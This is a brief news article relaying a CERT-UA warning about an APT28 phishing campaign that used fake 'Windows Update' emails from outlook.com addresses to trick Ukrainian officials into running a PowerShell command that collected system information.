CERT Ukraine: Beware of fake Windows updates distributed via Microsoft Outlook d...

CERT Ukraine: Beware of fake Windows updates distributed via Microsoft Outlook domain emails

The Computer Emergency Response Team (CERT) of Ukraine has issued a warning about a malicious campaign that is distributing fake Windows updates via emails. These fake emails are obviously malicious and are targeting Ukraine officials. CERT notes that the threat actors are using the outlook.com domain so as to appear legitimate and the subject of these mails are typically labelled as "Windows Update" which is a way to keep things simple. CERT adds that the campaign is being carried out by the APT28 group which is classified as an Advanced Persistent Threat malware group from Russia. It is also known by other names like Fancy Bear, Pawn Storm, among others.

On its bulletin, the CERT explains (Google-translated to English):

During April 2023, the government computer emergency response team of Ukraine CERT-UA recorded cases of the distribution of e-mails with the subject "Windows Update" among government bodies of Ukraine, sent, apparently, on behalf of system administrators of departments. At the same time, e-mail addresses of senders created on the public service "@outlook.com" can be formed using the employee's real surname and initials.

In case you are wondering how the threat actors are delivering the payload, CERT explains that the fake email basically outlines the instructions necessary to make the attack successful. Images are provided (see here) to help the victims install the malware on their own systems. This is done using PowerShell command which further downloads a script which is "designed to collect basic information about the computer using the 'tasklist', 'systeminfo' commands, and send the received results using HTTP request to the Mocky service API." It seems the campaign essentially relies on the naivety of the potential victims themselves to infect their systems.

You can find CERT's official announcement here.